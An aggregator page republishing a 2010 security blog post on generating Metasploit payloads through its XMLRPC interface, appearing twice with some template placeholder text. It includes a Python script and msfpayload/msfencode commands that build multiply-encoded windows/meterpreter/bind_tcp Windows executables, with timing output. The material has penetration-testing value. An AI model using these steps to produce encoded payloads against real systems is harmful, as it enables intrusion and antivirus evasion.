Welcome to our
Cyber Security News Aggregator
.Cyber Tzar
provide acyber security risk management
platform; including automated penetration tests and risk assesments culminating in a "cyber risk score" out of 1,000, just like a credit score.
First slide label
Some representative placeholder content for the first slide.
Second slide label
Some representative placeholder content for the second slide.
Third slide label
Some representative placeholder content for the third slide.
Fun with Metasploit payload generation
published on 2010-07-23 05:39:00 UTC by SussurroContent:
Tonight has been fun, I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:
I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.
Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:
It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.
Have thoughts or suggestions ?
Hit me up at sussurro [aT] happypacket DOT net
I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.
import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")
ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"
opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}
ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])
Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:
root@bt:~/msfmods/py# time (python get_payload.py > /tmp/test3)
real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )
real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.
Have thoughts or suggestions ?
Hit me up at sussurro [aT] happypacket DOT net
http://blog.happypacket.net/2010/07/fun-with-metasploit-payload-generation.html
Published: 2010 07 23 05:39:00
Received: 2021 06 06 09:04:44
Feed: Happy Packet Blog
Source: Happy Packet Blog
Category: Cyber Security
Topic: Cyber Security
Views: 2
